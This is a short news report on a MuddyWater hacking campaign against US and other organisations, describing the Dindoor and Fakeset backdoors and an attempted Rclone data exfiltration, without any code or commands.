An Iranian state-linked hacking group has infiltrated multiple US organizations, including banks, airports, and a defense-industry software supplier, according to a new report from Broadcom’s security divisions Symantec Threat Hunter Team and Carbon Black Threat Hunter Team.
The activity has been attributed to MuddyWater, a hacking unit believed to be affiliated with Iran’s Ministry of Intelligence and Security. Researchers say the campaign began in early February and intensified following recent US and Israeli military strikes on Iran.
Among the targets was the Israeli branch of a software company that supplies products to the defense and aerospace sectors. Investigators believe the group focused specifically on the company’s Israel-based operations.
The attacks against the software supplier, a US bank, and a Canadian non-profit organization deployed a previously unknown backdoor called ‘Dindoor.’ The malware uses the Deno runtime environment to execute malicious commands on compromised systems.
Researchers also detected an attempt to exfiltrate data from the software company using the open-source tool Rclone. The data was reportedly sent to a storage bucket hosted by Wasabi Technologies, although researchers say it is unclear whether the exfiltration attempt was successful.
In a separate intrusion affecting a US airport and a non-profit organization, the attackers deployed a Python-based backdoor known as Fakeset, which was downloaded from infrastructure linked to US cloud storage and backup provider Backblaze. The digital certificate used to sign Fakeset has previously been used to sign other malware tools called Stagecomp and Darkcomp, both associated with MuddyWater. Although the tools were not found in the latest intrusions, the shared certificates point to the same perpetrator.